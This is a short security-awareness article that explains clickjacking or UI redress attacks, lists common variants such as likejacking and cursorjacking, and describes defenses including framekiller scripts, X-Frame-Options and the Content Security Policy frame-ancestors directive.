What is the clickjacking or UI redress attack?
The clickjacking or UI redress attack is an attack in which the attacker uses an opaque or transparent layer on a webpage to trick a victim into clicking on a malicious link or button unknowingly. Thus, the attacker hijacks a user’s click and redirects the user to a different malicious page.
How does the clickjacking or UI redress attack work?
The clickjacking is done in different ways:
- Sometimes, an attacker deceives a user into clicking a like button or posting an update on a social networking website. Most of us have seen this clickjacking on popular social networking websites. This type of clickjacking is also called likejacking.
- Sometimes, the attacker hijacks the cursor of a user and makes the cursor point to a location different from where the user perceives it to lead. This type of clickjacking is also called cursorjacking.
- Sometimes, Password Managers fail to protect against iFrame and redirection-based attacks, and they expose unwanted passwords.
- Sometimes, unwanted advertisements get displayed on top of an email inbox or iPod. When a user clicks on the malicious ad, an iframe loads that can do malicious activities like deleting all messages, etc.
- Sometimes, the attacker loads a webpage into an invisible iframe and tricks the user into changing the security settings of some software like Flash Player so that the microphone, the camera, etc., can be exploited.
- Often, a user prefers to keep logged in to eCommerce websites. An attacker may trick the user into clicking on a social media “like” button and load the eCommerce website in a transparent iframe. As a result, when the user clicks on the like button, some expensive items may get bought from the eCommerce website using the user’s credit card.
How to prevent clickjacking or UI redress attacks?
We can take a couple of steps to prevent this attack.
- Some browser addons like NoScript can prevent users from clicking on invisible page elements. Here is a comprehensive guide on increasing the security and privacy of browsers.
- Some commercial products like GuardedID can make all frames on the page visible and protect against these attacks.
- In some secure web browsers like Gazelle, a window of different origin can only draw dynamic contents over another window’s screen space if the content it draws is opaque. Thus, it can protect users from clicking on something unknowingly.
- Website owners can include framekiller Javascript snippets in webpages to prevent inside frames from different sources.
- Many web browsers now adopt HTTP headers like X-Frame-Options, and they can prevent clickjacking partially.
- The frame-ancestors directive of the Content Security Policy can prevent potentially hostile pages using iframe, object, etc., and prevent clickjacking.
So, beware of various security vulnerabilities and stay safe and secure. This article gives a brief overview of the clickjacking or UI redress attack. Interested readers who want more information on different web application attacks and their preventive measures may want to refer to the book “Web Application Vulnerabilities And Prevention.”
0 Comments